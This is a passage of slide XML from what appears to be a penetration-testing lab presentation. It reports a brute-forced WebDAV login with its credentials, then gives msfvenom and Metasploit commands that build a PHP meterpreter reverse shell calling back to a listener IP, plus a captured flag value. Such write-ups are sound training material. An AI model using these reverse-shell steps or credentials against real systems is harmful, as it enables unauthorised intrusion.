                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>By successfully utilizing this exploit since there were no password policy restrictions on the website, the password was able to be “cracked” in under a minute after about 10144 tries were attempted. The valid login to the folder is as follows:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Login: ashton</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Password: leopoldo </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="343" name="Google Shape;1145;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8296200" y="2831040"/>
            <a:ext cx="533160" cy="533520"/>
            <a:chOff x="8296200" y="2831040"/>
            <a:chExt cx="533160" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="344" name="Google Shape;1146;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8296200" y="2831040"/>
              <a:ext cx="533160" cy="476280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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2100" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="345" name="Google Shape;1147;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="8433000" y="3220200"/>
              <a:ext cx="260640" cy="144360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Google Shape;1148;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3495240" y="3401640"/>
            <a:ext cx="5333400" cy="1265040"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="347" name="Google Shape;1149;p63" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3261960" y="3401640"/>
            <a:ext cx="5567400" cy="12650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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Exploitation: Unsecured WebDAV Usage</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Google Shape;1156;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="723600" y="1480680"/>
            <a:ext cx="2428200" cy="3153960"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Google Shape;1157;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724320" y="1480680"/>
            <a:ext cx="2371320" cy="3153960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="182880" rIns="182880" tIns="182880" bIns="182880" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Having an unsecured WebDAV setup on a webserver allows for possible download and upload of malicious files. Using msfvenom to generate a reverse tcp shell connection via a php file, it was then uploaded to the server after logging in with valid credentials. Metasploit php exploit listener was used to wait for the server to execute the php script and establish a reverse shell connection through meterpreter.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; msfshell.php</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>set payload php/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="352" name="Google Shape;1158;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="887760"/>
            <a:ext cx="533160" cy="533520"/>
            <a:chOff x="457200" y="887760"/>
            <a:chExt cx="533160" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="353" name="Google Shape;1159;p64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="887760"/>
              <a:ext cx="533160" cy="476280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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2100" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="354" name="Google Shape;1160;p64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="593640" y="1276920"/>
              <a:ext cx="260640" cy="144360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="355" name="Google Shape;1161;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228840" y="887760"/>
            <a:ext cx="533160" cy="533520"/>
            <a:chOff x="3228840" y="887760"/>
            <a:chExt cx="533160" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="356" name="Google Shape;1162;p64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3228840" y="887760"/>
              <a:ext cx="533160" cy="476280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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2100" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="357" name="Google Shape;1163;p64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3365640" y="1276920"/>
              <a:ext cx="260640" cy="144360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Google Shape;1164;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3495240" y="1480680"/>
            <a:ext cx="5333400" cy="1737720"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;1165;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3495960" y="1480680"/>
            <a:ext cx="5333400" cy="1737720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="182880" rIns="182880" tIns="182880" bIns="182880" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>When the malicious PHP file was ran with the reverse_tcp script embedded in the file, it called out to our metasploit console and established a meterpreter session to access the system. After successfully gaining shell access via the shell command, a “locate” command was used to look for the “flat” file. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>locate *flag* (flag.txt = b1ng0w@5h1sn@m0) </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Google Shape;1166;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3495240" y="3401640"/>
            <a:ext cx="5333400" cy="1265040"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="361" name="Google Shape;1167;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3508560" y="3030840"/>
            <a:ext cx="533160" cy="533520"/>
            <a:chOff x="3508560" y="3030840"/>
            <a:chExt cx="533160" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="362" name="Google Shape;1168;p64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3508560" y="3030840"/>
              <a:ext cx="533160" cy="476280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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2100" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="363" name="Google Shape;1169;p64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3645000" y="3420000"/>
              <a:ext cx="260640" cy="144360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="364" name="Google Shape;1170;p64" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3508200" y="3751200"/>
            <a:ext cx="5333400" cy="978120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="365" name="Google Shape;1171;p64" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6594840" y="2673000"/>
            <a:ext cx="2234520" cy="1077840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="366" name="Google Shape;1172;p64" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410800" y="3030840"/>
            <a:ext cx="1000800" cy="6418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7" name="Google Shape;1177;p65" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="289800"/>
            <a:ext cx="8595000" cy="4593240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="1687320"/>
            <a:ext cx="8595000" cy="888120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Blue Team</a:t>
